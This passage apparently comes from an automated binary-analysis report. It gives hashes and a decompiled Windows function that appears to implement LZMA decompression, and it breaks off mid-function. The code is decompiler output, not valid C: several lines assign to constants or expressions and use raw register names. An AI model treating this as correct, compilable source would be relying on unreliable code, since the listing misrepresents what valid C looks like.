                                                                      • Opcode Fuzzy Hash: 36b8550c79165f3bd8438b4b7b77fc639822643401bcc62ffa2a7152ccecd571
                                                                      • Instruction Fuzzy Hash: F7814571E04228CFDF24CFA8C8447ADBBB1FB45305F24816AD856BB281C778A996DF45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 98%
                                                                      			E0040690B(void* __ecx) {
                                                                      				void* _v8;
                                                                      				void* _v12;
                                                                      				signed int _v16;
                                                                      				unsigned int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				signed int _v64;
                                                                      				signed int _v68;
                                                                      				signed int _v72;
                                                                      				signed int _v76;
                                                                      				signed int _v80;
                                                                      				signed int _v84;
                                                                      				signed int _v88;
                                                                      				signed int _v92;
                                                                      				signed int _v95;
                                                                      				signed int _v96;
                                                                      				signed int _v100;
                                                                      				signed int _v104;
                                                                      				signed int _v108;
                                                                      				signed int _v112;
                                                                      				signed int _v116;
                                                                      				signed int _v120;
                                                                      				intOrPtr _v124;
                                                                      				signed int _v128;
                                                                      				signed int _v132;
                                                                      				signed int _v136;
                                                                      				void _v140;
                                                                      				void* _v148;
                                                                      				signed int _t537;
                                                                      				signed int _t538;
                                                                      				signed int _t572;
                                                                      
                                                                      				_t572 = 0x22;
                                                                      				_v148 = __ecx;
                                                                      				memcpy( &_v140, __ecx, _t572 << 2);
                                                                      				if(_v52 == 0xffffffff) {
                                                                      					return 1;
                                                                      				}
                                                                      				while(1) {
                                                                      					L3:
                                                                      					_t537 = _v140;
                                                                      					if(_t537 > 0x1c) {
                                                                      						break;
                                                                      					}
                                                                      					switch( *((intOrPtr*)(_t537 * 4 +  &M0040735D))) {
                                                                      						case 0:
                                                                      							__eflags = _v112;
                                                                      							if(_v112 == 0) {
                                                                      								goto L173;
                                                                      							}
                                                                      							_v112 = _v112 - 1;
                                                                      							_v116 = _v116 + 1;
                                                                      							_t537 =  *_v116;
                                                                      							__eflags = _t537 - 0xe1;
                                                                      							if(_t537 > 0xe1) {
                                                                      								goto L174;
                                                                      							}
                                                                      							_t542 = _t537 & 0x000000ff;
                                                                      							_push(0x2d);
                                                                      							asm("cdq");
                                                                      							_pop(_t576);
                                                                      							_push(9);
                                                                      							_pop(_t577);
                                                                      							_t622 = _t542 / _t576;
                                                                      							_t544 = _t542 % _t576 & 0x000000ff;
                                                                      							asm("cdq");
                                                                      							_t617 = _t544 % _t577 & 0x000000ff;
                                                                      							_v64 = _t617;
                                                                      							_v32 = (1 << _t622) - 1;
                                                                      							_v28 = (1 << _t544 / _t577) - 1;
                                                                      							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                                      							__eflags = 0x600 - _v124;
                                                                      							if(0x600 == _v124) {
                                                                      								L12:
                                                                      								__eflags = _t625;
                                                                      								if(_t625 == 0) {
                                                                      									L14:
                                                                      									_v76 = _v76 & 0x00000000;
                                                                      									_v68 = _v68 & 0x00000000;
                                                                      									goto L17;
                                                                      								} else {
                                                                      									goto L13;
                                                                      								}
                                                                      								do {
                                                                      									L13:
                                                                      									_t625 = _t625 - 1;
                                                                      									__eflags = _t625;
                                                                      									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                                      								} while (_t625 != 0);
                                                                      								goto L14;
                                                                      							}
                                                                      							__eflags = _v8;
                                                                      							if(_v8 != 0) {
                                                                      								GlobalFree(_v8);
                                                                      							}
                                                                      							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                                      							__eflags = _t537;
                                                                      							_v8 = _t537;
                                                                      							if(_t537 == 0) {
                                                                      								goto L174;
                                                                      							} else {
                                                                      								_v124 = 0x600;
                                                                      								goto L12;
                                                                      							}
                                                                      						case 1:
                                                                      							L15:
                                                                      							__eflags = _v112;
                                                                      							if(_v112 == 0) {
                                                                      								_v140 = 1;
                                                                      								goto L173;
                                                                      							}
                                                                      							_v112 = _v112 - 1;
                                                                      							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                                      							_v116 = _v116 + 1;
                                                                      							_t50 =  &_v76;
                                                                      							 *_t50 = _v76 + 1;
                                                                      							__eflags =  *_t50;
                                                                      							L17:
                                                                      							__eflags = _v76 - 4;
                                                                      							if(_v76 < 4) {
                                                                      								goto L15;
                                                                      							}
                                                                      							_t550 = _v68;
                                                                      							__eflags = _t550 - _v120;
                                                                      							if(_t550 == _v120) {
                                                                      								L22:
                                                                      								_v76 = 5;
                                                                      								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                                      								goto L25;
                                                                      							}
                                                                      							__eflags = _v12;
                                                                      							_v120 = _t550;
                                                                      							if(_v12 != 0) {
                                                                      								GlobalFree(_v12);
                                                                      							}
                                                                      							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                                      							__eflags = _t537;
                                                                      							_v12 = _t537;
                                                                      							if(_t537 == 0) {
                                                                      								goto L174;
                                                                      							} else {
                                                                      								goto L22;
                                                                      							}
                                                                      						case 2:
                                                                      							L26:
                                                                      							_t557 = _v100 & _v32;
                                                                      							_v136 = 6;
                                                                      							_v80 = _t557;
                                                                      							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                                      							goto L135;
                                                                      						case 3:
                                                                      							L23:
                                                                      							__eflags = _v112;
                                                                      							if(_v112 == 0) {
                                                                      								_v140 = 3;
                                                                      								goto L173;
                                                                      							}
                                                                      							_v112 = _v112 - 1;
                                                                      							_t72 =  &_v116;
                                                                      							 *_t72 = _v116 + 1;
                                                                      							__eflags =  *_t72;
                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                      							L25:
                                                                      							_v76 = _v76 - 1;
                                                                      							__eflags = _v76;
                                                                      							if(_v76 != 0) {
                                                                      								goto L23;
                                                                      							}
                                                                      							goto L26;
                                                                      						case 4:
                                                                      							L136:
                                                                      							_t559 =  *_t626;
                                                                      							_t610 = _t559 & 0x0000ffff;
                                                                      							_t591 = (_v20 >> 0xb) * _t610;
                                                                      							__eflags = _v16 - _t591;
                                                                      							if(_v16 >= _t591) {
                                                                      								_v20 = _v20 - _t591;
                                                                      								_v16 = _v16 - _t591;
                                                                      								_v68 = 1;
                                                                      								_t560 = _t559 - (_t559 >> 5);
                                                                      								__eflags = _t560;
                                                                      								 *_t626 = _t560;
                                                                      							} else {
                                                                      								_v20 = _t591;
                                                                      								_v68 = _v68 & 0x00000000;
                                                                      								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                                      							}
                                                                      							__eflags = _v20 - 0x1000000;
                                                                      							if(_v20 >= 0x1000000) {
                                                                      								goto L142;
                                                                      							} else {
                                                                      								goto L140;
                                                                      							}
                                                                      						case 5:
                                                                      							L140:
                                                                      							__eflags = _v112;
                                                                      							if(_v112 == 0) {
                                                                      								_v140 = 5;
                                                                      								goto L173;
                                                                      							}
                                                                      							_v20 = _v20 << 8;
                                                                      							_v112 = _v112 - 1;
                                                                      							_t464 =  &_v116;
                                                                      							 *_t464 = _v116 + 1;
                                                                      							__eflags =  *_t464;
                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                      							L142:
                                                                      							_t561 = _v136;
                                                                      							goto L143;
                                                                      						case 6:
                                                                      							__edx = 0;
                                                                      							__eflags = _v68;
                                                                      							if(_v68 != 0) {
                                                                      								__eax = _v8;
                                                                      								__ecx = _v60;
                                                                      								_v56 = 1;
                                                                      								_v136 = 7;
                                                                      								__esi = _v8 + 0x180 + _v60 * 2;
                                                                      								goto L135;
                                                                      							}
                                                                      							__eax = _v96 & 0x000000ff;
                                                                      							__esi = _v100;
                                                                      							__cl = 8;
                                                                      							__cl = 8 - _v64;
                                                                      							__esi = _v100 & _v28;
                                                                      							__eax = (_v96 & 0x000000ff) >> 8;
                                                                      							__ecx = _v64;
                                                                      							__esi = (_v100 & _v28) << 8;
                                                                      							__ecx = _v8;
                                                                      							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                                                      							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                                                      							__eflags = _v60 - 4;
                                                                      							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                      							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                      							if(_v60 >= 4) {
                                                                      								__eflags = _v60 - 0xa;
                                                                      								if(_v60 >= 0xa) {
                                                                      									_t103 =  &_v60;
                                                                      									 *_t103 = _v60 - 6;
                                                                      									__eflags =  *_t103;
                                                                      								} else {
                                                                      									_v60 = _v60 - 3;
                                                                      								}
                                                                      							} else {
                                                                      								_v60 = 0;
                                                                      							}
                                                                      							__eflags = _v56 - __edx;
                                                                      							if(_v56 == __edx) {
                                                                      								__ebx = 0;
                                                                      								__ebx = 1;
                                                                      								goto L63;
                                                                      							}
                                                                      							__eax = _v24;
                                                                      							__eax = _v24 - _v48;
                                                                      							__eflags = __eax - _v120;
                                                                      							if(__eax >= _v120) {
                                                                      								__eax = __eax + _v120;
                                                                      								__eflags = __eax;
                                                                      							}
                                                                      							__ecx = _v12;
                                                                      							__ebx = 0;
                                                                      							__ebx = 1;
                                                                      							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                      							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                                                      							goto L43;
                                                                      						case 7:
                                                                      							__eflags = _v68 - 1;
                                                                      							if(_v68 != 1) {
                                                                      								__eax = _v40;
                                                                      								_v132 = 0x16;
                                                                      								_v36 = _v40;
                                                                      								__eax = _v44;
                                                                      								_v40 = _v44;
                                                                      								__eax = _v48;
                                                                      								_v44 = _v48;
                                                                      								__eax = 0;
                                                                      								__eflags = _v60 - 7;
                                                                      								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                      								__al = __al & 0x000000fd;
                                                                      								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                      								_v60 = (__eflags >= 0) - 1 + 0xa;
                                                                      								__eax = _v8;
                                                                      								__eax = _v8 + 0x664;
                                                                      								__eflags = __eax;
                                                                      								_v92 = __eax;
                                                                      								goto L71;
                                                                      							}
                                                                      							__eax = _v8;
                                                                      							__ecx = _v60;
                                                                      							_v136 = 8;
                                                                      							__esi = _v8 + 0x198 + _v60 * 2;
                                                                      							goto L135;
                                                                      						case 8:
                                                                      							__eflags = _v68;
                                                                      							if(_v68 != 0) {
                                                                      								__eax = _v8;
                                                                      								__ecx = _v60;
                                                                      								_v136 = 0xa;
                                                                      								__esi = _v8 + 0x1b0 + _v60 * 2;
                                                                      							} else {
                                                                      								__eax = _v60;
                                                                      								__ecx = _v8;
                                                                      								__eax = _v60 + 0xf;
                                                                      								_v136 = 9;
                                                                      								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                                                      								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                                                      							}
                                                                      							goto L135;
                                                                      						case 9:
                                                                      							__eflags = _v68;
                                                                      							if(_v68 != 0) {
                                                                      								goto L92;
                                                                      							}
                                                                      							__eflags = _v100;
                                                                      							if(_v100 == 0) {
                                                                      								goto L174;
                                                                      							}
                                                                      							__eax = 0;
                                                                      							__eflags = _v60 - 7;
                                                                      							_t264 = _v60 - 7 >= 0;
                                                                      							__eflags = _t264;
                                                                      							0 | _t264 = _t264 + _t264 + 9;
                                                                      							_v60 = _t264 + _t264 + 9;
                                                                      							goto L78;
                                                                      						case 0xa:
                                                                      							__eflags = _v68;
                                                                      							if(_v68 != 0) {
                                                                      								__eax = _v8;
                                                                      								__ecx = _v60;
                                                                      								_v136 = 0xb;
                                                                      								__esi = _v8 + 0x1c8 + _v60 * 2;
                                                                      								goto L135;
                                                                      							}
                                                                      							__eax = _v44;
                                                                      							goto L91;
                                                                      						case 0xb:
                                                                      							__eflags = _v68;
                                                                      							if(_v68 != 0) {
                                                                      								__ecx = _v40;
                                                                      								__eax = _v36;
                                                                      								_v36 = _v40;
                                                                      							} else {
                                                                      								__eax = _v40;
                                                                      							}
                                                                      							__ecx = _v44;
                                                                      							_v40 = _v44;
                                                                      							L91:
                                                                      							__ecx = _v48;
                                                                      							_v48 = __eax;
                                                                      							_v44 = _v48;
                                                                      							L92:
                                                                      							__eax = _v8;
                                                                      							_v132 = 0x15;
                                                                      							__eax = _v8 + 0xa68;
                                                                      							_v92 = _v8 + 0xa68;
                                                                      							goto L71;
                                                                      						case 0xc:
                                                                      							L102:
                                                                      							__eflags = _v112;
                                                                      							if(_v112 == 0) {
                                                                      								_v140 = 0xc;
                                                                      								goto L173;
                                                                      							}
                                                                      							__ecx = _v116;
                                                                      							__eax = _v16;
                                                                      							_v20 = _v20 << 8;
                                                                      							__ecx =  *_v116 & 0x000000ff;
                                                                      							_v112 = _v112 - 1;
                                                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                      							_t340 =  &_v116;
                                                                      							 *_t340 = _v116 + 1;
                                                                      							__eflags =  *_t340;
                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                      							__eax = _v48;
                                                                      							goto L104;
                                                                      						case 0xd:
                                                                      							L39:
                                                                      							__eflags = _v112;
                                                                      							if(_v112 == 0) {
                                                                      								_v140 = 0xd;
                                                                      								goto L173;
                                                                      							}
                                                                      							__ecx = _v116;
                                                                      							__eax = _v16;
                                                                      							_v20 = _v20 << 8;
                                                                      							__ecx =  *_v116 & 0x000000ff;
                                                                      							_v112 = _v112 - 1;
                                                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                      							_t127 =  &_v116;
                                                                      							 *_t127 = _v116 + 1;
                                                                      							__eflags =  *_t127;
                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                      							L41:
                                                                      							__eax = _v68;
                                                                      							__eflags = _v76 - _v68;
                                                                      							if(_v76 != _v68) {
                                                                      								goto L50;
                                                                      							}
                                                                      							__eflags = __ebx - 0x100;
                                                                      							if(__ebx >= 0x100) {
                                                                      								goto L56;
                                                                      							}
                                                                      							L43:
                                                                      							__eax = _v95 & 0x000000ff;
                                                                      							_v95 = _v95 << 1;
                                                                      							__ecx = _v92;
                                                                      							__eax = (_v95 & 0x000000ff) >> 7;
                                                                      							_v76 = __eax;
                                                                      							__eax = __eax + 1;
                                                                      							__eax = __eax << 8;
                                                                      							__eax = __eax + __ebx;
                                                                      							__esi = _v92 + __eax * 2;
                                                                      							_v20 = _v20 >> 0xb;
                                                                      							__ax =  *__esi;
                                                                      							_v88 = __esi;
                                                                      							__edx = __ax & 0x0000ffff;
                                                                      							__ecx = (_v20 >> 0xb) * __edx;
                                                                      							__eflags = _v16 - __ecx;
                                                                      							if(_v16 >= __ecx) {
                                                                      								_v20 = _v20 - __ecx;
                                                                      								_v16 = _v16 - __ecx;
                                                                      								__cx = __ax;
                                                                      								_v68 = 1;
                                                                      								__cx = __ax >> 5;
                                                                      								__eflags = __eax;
                                                                      								__ebx = __ebx + __ebx + 1;
                                                                      								 *__esi = __ax;
                                                                      							} else {
                                                                      								_v68 = _v68 & 0x00000000;
                                                                      								_v20 = __ecx;
                                                                      								0x800 = 0x800 - __edx;
                                                                      								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                      								__ebx = __ebx + __ebx;
                                                                      								 *__esi = __cx;
                                                                      							}
                                                                      							__eflags = _v20 - 0x1000000;
                                                                      							_v72 = __ebx;
                                                                      							if(_v20 >= 0x1000000) {
                                                                      								goto L41;
                                                                      							} else {
                                                                      								goto L39;
                                                                      							}
                                                                      						case 0xe:
                                                                      							L48:
                                                                      							__eflags = _v112;
                                                                      							if(_v112 == 0) {
                                                                      								_v140 = 0xe;
                                                                      								goto L173;
                                                                      							}
                                                                      							__ecx = _v116;
                                                                      							__eax = _v16;
                                                                      							_v20 = _v20 << 8;
                                                                      							__ecx =  *_v116 & 0x000000ff;
                                                                      							_v112 = _v112 - 1;
                                                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                      							_t161 =  &_v116;
                                                                      							 *_t161 = _v116 + 1;
                                                                      							__eflags =  *_t161;
                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                      							while(1) {
                                                                      								L50:
                                                                      								__eflags = __ebx - 0x100;
                                                                      								if(__ebx >= 0x100) {
                                                                      									break;
                                                                      								}
                                                                      								__eax = _v92;
                                                                      								__edx = __ebx + __ebx;
                                                                      								__ecx = _v20;
                                                                      								__esi = __edx + __eax;
                                                                      								__ecx = _v20 >> 0xb;
                                                                      								__ax =  *__esi;
                                                                      								_v88 = __esi;
                                                                      								__edi = __ax & 0x0000ffff;
                                                                      								__ecx = (_v20 >> 0xb) * __edi;
                                                                      								__eflags = _v16 - __ecx;
                                                                      								if(_v16 >= __ecx) {
                                                                      									_v20 = _v20 - __ecx;
                                                                      									_v16 = _v16 - __ecx;
                                                                      									__cx = __ax;
                                                                      									_t175 = __edx + 1; // 0x1
                                                                      									__ebx = _t175;
                                                                      									__cx = __ax >> 5;
                                                                      									__eflags = __eax;
                                                                      									 *__esi = __ax;
                                                                      								} else {
                                                                      									_v20 = __ecx;
                                                                      									0x800 = 0x800 - __edi;
                                                                      									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                      									__ebx = __ebx + __ebx;
                                                                      									 *__esi = __cx;
                                                                      								}
                                                                      								__eflags = _v20 - 0x1000000;
                                                                      								_v72 = __ebx;
                                                                      								if(_v20 >= 0x1000000) {
                                                                      									continue;
                                                                      								} else {
                                                                      									goto L48;
                                                                      								}
                                                                      							}
                                                                      							L56:
                                                                      							_t178 =  &_v56;
                                                                      							 *_t178 = _v56 & 0x00000000;
                                                                      							__eflags =  *_t178;
                                                                      							goto L57;
                                                                      						case 0xf:
                                                                      							L60:
                                                                      							__eflags = _v112;
                                                                      							if(_v112 == 0) {
                                                                      								_v140 = 0xf;
                                                                      								goto L173;
                                                                      							}
                                                                      							__ecx = _v116;
                                                                      							__eax = _v16;
                                                                      							_v20 = _v20 << 8;
                                                                      							__ecx =  *_v116 & 0x000000ff;
                                                                      							_v112 = _v112 - 1;
                                                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                      							_t208 =  &_v116;
                                                                      							 *_t208 = _v116 + 1;
                                                                      							__eflags =  *_t208;
                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                      							L62:
                                                                      							__eflags = __ebx - 0x100;
                                                                      							if(__ebx >= 0x100) {
                                                                      								L57:
                                                                      								__al = _v72;
                                                                      								_v96 = _v72;
                                                                      								goto L58;
                                                                      							}
                                                                      							L63:
                                                                      							__eax = _v92;
                                                                      							__edx = __ebx + __ebx;
                                                                      							__ecx = _v20;
                                                                      							__esi = __edx + __eax;
                                                                      							__ecx = _v20 >> 0xb;
                                                                      							__ax =  *__esi;
                                                                      							_v88 = __esi;
                                                                      							__edi = __ax & 0x0000ffff;
                                                                      							__ecx = (_v20 >> 0xb) * __edi;
                                                                      							__eflags = _v16 - __ecx;
                                                                      							if(_v16 >= __ecx) {
                                                                      								_v20 = _v20 - __ecx;
                                                                      								_v16 = _v16 - __ecx;
                                                                      								__cx = __ax;
                                                                      								_t222 = __edx + 1; // 0x1
                                                                      								__ebx = _t222;
                                                                      								__cx = __ax >> 5;
                                                                      								__eflags = __eax;
                                                                      								 *__esi = __ax;
                                                                      							} else {
                                                                      								_v20 = __ecx;
                                                                      								0x800 = 0x800 - __edi;
                                                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                      								__ebx = __ebx + __ebx;
                                                                      								 *__esi = __cx;
                                                                      							}
                                                                      							__eflags = _v20 - 0x1000000;
                                                                      							_v72 = __ebx;
                                                                      							if(_v20 >= 0x1000000) {
                                                                      								goto L62;
                                                                      							} else {
                                                                      								goto L60;
                                                                      							}
                                                                      						case 0x10:
                                                                      							L112:
                                                                      							__eflags = _v112;
                                                                      							if(_v112 == 0) {
                                                                      								_v140 = 0x10;
                                                                      								goto L173;
                                                                      							}
                                                                      							__ecx = _v116;
                                                                      							__eax = _v16;
                                                                      							_v20 = _v20 << 8;
                                                                      							__ecx =  *_v116 & 0x000000ff;
                                                                      							_v112 = _v112 - 1;
                                                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                      							_t371 =  &_v116;
                                                                      							 *_t371 = _v116 + 1;
                                                                      							__eflags =  *_t371;
                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                      							goto L114;
                                                                      						case 0x11:
                                                                      							L71:
                                                                      							__esi = _v92;
                                                                      							_v136 = 0x12;
                                                                      							goto L135;
                                                                      						case 0x12:
                                                                      							__eflags = _v68;
                                                                      							if(_v68 != 0) {
                                                                      								__eax = _v92;
                                                                      								_v136 = 0x13;
                                                                      								__esi = _v92 + 2;
                                                                      								L135:
                                                                      								_v88 = _t626;
                                                                      								goto L136;
                                                                      							}
                                                                      							__eax = _v80;
                                                                      							_v52 = _v52 & 0x00000000;
                                                                      							__ecx = _v92;
                                                                      							__eax = _v80 << 4;
                                                                      							__eflags = __eax;
                                                                      							__eax = _v92 + __eax + 4;
                                                                      							goto L133;
                                                                      						case 0x13:
                                                                      							__eflags = _v68;
                                                                      							if(_v68 != 0) {
                                                                      								_t475 =  &_v92;
                                                                      								 *_t475 = _v92 + 0x204;
                                                                      								__eflags =  *_t475;
                                                                      								_v52 = 0x10;
                                                                      								_v68 = 8;
                                                                      								L147:
                                                                      								_v128 = 0x14;
                                                                      								goto L148;
                                                                      							}
                                                                      							__eax = _v80;
                                                                      							__ecx = _v92;
                                                                      							__eax = _v80 << 4;
                                                                      							_v52 = 8;
                                                                      							__eax = _v92 + (_v80 << 4) + 0x104;
                                                                      							L133:
                                                                      							_v92 = __eax;
                                                                      							_v68 = 3;
                                                                      							goto L147;
                                                                      						case 0x14:
                                                                      							_v52 = _v52 + __ebx;
                                                                      							__eax = _v132;
                                                                      							goto L143;
                                                                      						case 0x15:
                                                                      							__eax = 0;
                                                                      							__eflags = _v60 - 7;
                                                                      							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                      							__al = __al & 0x000000fd;
                                                                      							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                      							_v60 = (__eflags >= 0) - 1 + 0xb;
                                                                      							goto L123;
                                                                      						case 0x16:
                                                                      							__eax = _v52;
                                                                      							__eflags = __eax - 4;
                                                                      							if(__eax >= 4) {
                                                                      								_push(3);
                                                                      								_pop(__eax);
                                                                      							}
                                                                      							__ecx = _v8;
                                                                      							_v68 = 6;
                                                                      							__eax = __eax << 7;
                                                                      							_v128 = 0x19;
                                                                      							_v92 = __eax;
                                                                      							goto L148;
                                                                      						case 0x17:
                                                                      							L148:
                                                                      							__eax = _v68;
                                                                      							_v84 = 1;
                                                                      							_v76 = _v68;
                                                                      							goto L152;
                                                                      						case 0x18:
                                                                      							L149:
                                                                      							__eflags = _v112;
                                                                      							if(_v112 == 0) {
                                                                      								_v140 = 0x18;
                                                                      								goto L173;
                                                                      							}
                                                                      							__ecx = _v116;
                                                                      							__eax = _v16;
                                                                      							_v20 = _v20 << 8;
                                                                      							__ecx =  *_v116 & 0x000000ff;
                                                                      							_v112 = _v112 - 1;
                                                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                      							_t490 =  &_v116;
                                                                      							 *_t490 = _v116 + 1;
                                                                      							__eflags =  *_t490;
                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                      							L151:
                                                                      							_t493 =  &_v76;
                                                                      							 *_t493 = _v76 - 1;
                                                                      							__eflags =  *_t493;
                                                                      							L152:
                                                                      							__eflags = _v76;
                                                                      							if(_v76 <= 0) {
                                                                      								__ecx = _v68;
                                                                      								__ebx = _v84;
                                                                      								0 = 1;
                                                                      								__eax = 1 << __cl;
                                                                      								__ebx = _v84 - (1 << __cl);
                                                                      								__eax = _v128;
                                                                      								_v72 = __ebx;
                                                                      								L143:
                                                                      								_v140 = _t561;
                                                                      								goto L3;
                                                                      							}
                                                                      							__eax = _v84;
                                                                      							_v20 = _v20 >> 0xb;
                                                                      							__edx = _v84 + _v84;
                                                                      							__eax = _v92;
                                                                      							__esi = __edx + __eax;
                                                                      							_v88 = __esi;
                                                                      							__ax =  *__esi;
                                                                      							__edi = __ax & 0x0000ffff;
                                                                      							__ecx = (_v20 >> 0xb) * __edi;
                                                                      							__eflags = _v16 - __ecx;
                                                                      							if(_v16 >= __ecx) {
                                                                      								_v20 = _v20 - __ecx;
                                                                      								_v16 = _v16 - __ecx;
                                                                      								__cx = __ax;
                                                                      								__cx = __ax >> 5;
                                                                      								__eax = __eax - __ecx;
                                                                      								__edx = __edx + 1;
                                                                      								__eflags = __edx;
                                                                      								 *__esi = __ax;
                                                                      								_v84 = __edx;
                                                                      							} else {
                                                                      								_v20 = __ecx;
                                                                      								0x800 = 0x800 - __edi;
                                                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                      								_v84 = _v84 << 1;
                                                                      								 *__esi = __cx;
                                                                      							}
                                                                      							__eflags = _v20 - 0x1000000;
                                                                      							if(_v20 >= 0x1000000) {
                                                                      								goto L151;
                                                                      							} else {
                                                                      								goto L149;
                                                                      							}
                                                                      						case 0x19:
                                                                      							__eflags = __ebx - 4;
                                                                      							if(__ebx < 4) {
                                                                      								_v48 = __ebx;
                                                                      								L122:
                                                                      								_t399 =  &_v48;
                                                                      								 *_t399 = _v48 + 1;
                                                                      								__eflags =  *_t399;
                                                                      								L123:
                                                                      								__eax = _v48;
                                                                      								__eflags = __eax;
                                                                      								if(__eax == 0) {
                                                                      									_v52 = _v52 | 0xffffffff;
                                                                      									goto L173;
                                                                      								}
                                                                      								__eflags = __eax - _v100;
                                                                      								if(__eax > _v100) {
                                                                      									goto L174;
                                                                      								}
                                                                      								_v52 = _v52 + 2;
                                                                      								__eax = _v52;
                                                                      								_t406 =  &_v100;
                                                                      								 *_t406 = _v100 + _v52;
                                                                      								__eflags =  *_t406;
                                                                      								goto L126;
                                                                      							}
                                                                      							__ecx = __ebx;
                                                                      							__eax = __ebx;
                                                                      							__ecx = __ebx >> 1;
                                                                      							__eax = __ebx & 0x00000001;
                                                                      							__ecx = (__ebx >> 1) - 1;
                                                                      							__al = __al | 0x00000002;
                                                                      							__eax = (__ebx & 0x00000001) << __cl;
                                                                      							__eflags = __ebx - 0xe;
                                                                      							_v48 = __eax;
                                                                      							if(__ebx >= 0xe) {
                                                                      								__ebx = 0;
                                                                      								_v76 = __ecx;
                                                                      								L105:
                                                                      								__eflags = _v76;
                                                                      								if(_v76 <= 0) {
                                                                      									__eax = __eax + __ebx;
                                                                      									_v68 = 4;
                                                                      									_v48 = __eax;
                                                                      									__eax = _v8;
                                                                      									__eax = _v8 + 0x644;
                                                                      									__eflags = __eax;
                                                                      									L111:
                                                                      									__ebx = 0;
                                                                      									_v92 = __eax;
                                                                      									_v84 = 1;
                                                                      									_v72 = 0;
                                                                      									_v76 = 0;
                                                                      									L115:
                                                                      									__eax = _v68;
                                                                      									__eflags = _v76 - _v68;
                                                                      									if(_v76 >= _v68) {
                                                                      										_t397 =  &_v48;
                                                                      										 *_t397 = _v48 + __ebx;
                                                                      										__eflags =  *_t397;
                                                                      										goto L122;
                                                                      									}
                                                                      									__eax = _v84;
                                                                      									_v20 = _v20 >> 0xb;
                                                                      									__edi = _v84 + _v84;
                                                                      									__eax = _v92;
                                                                      									__esi = __edi + __eax;
                                                                      									_v88 = __esi;
                                                                      									__ax =  *__esi;
                                                                      									__ecx = __ax & 0x0000ffff;
                                                                      									__edx = (_v20 >> 0xb) * __ecx;
                                                                      									__eflags = _v16 - __edx;
                                                                      									if(_v16 >= __edx) {
                                                                      										__ecx = 0;
                                                                      										_v20 = _v20 - __edx;
                                                                      										__ecx = 1;
                                                                      										_v16 = _v16 - __edx;
                                                                      										__ebx = 1;
                                                                      										__ecx = _v76;
                                                                      										__ebx = 1 << __cl;
                                                                      										__ecx = 1 << __cl;
                                                                      										__ebx = _v72;
                                                                      										__ebx = _v72 | __ecx;
                                                                      										__cx = __ax;
                                                                      										__cx = __ax >> 5;
                                                                      										__eax = __eax - __ecx;
                                                                      										__edi = __edi + 1;
                                                                      										__eflags = __edi;
                                                                      										_v72 = __ebx;
                                                                      										 *__esi = __ax;
                                                                      										_v84 = __edi;
                                                                      									} else {
                                                                      										_v20 = __edx;
                                                                      										0x800 = 0x800 - __ecx;
                                                                      										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                      										_v84 = _v84 << 1;
                                                                      										 *__esi = __dx;
                                                                      									}
                                                                      									__eflags = _v20 - 0x1000000;
                                                                      									if(_v20 >= 0x1000000) {
                                                                      										L114:
                                                                      										_t374 =  &_v76;
                                                                      										 *_t374 = _v76 + 1;
                                                                      										__eflags =  *_t374;
                                                                      										goto L115;
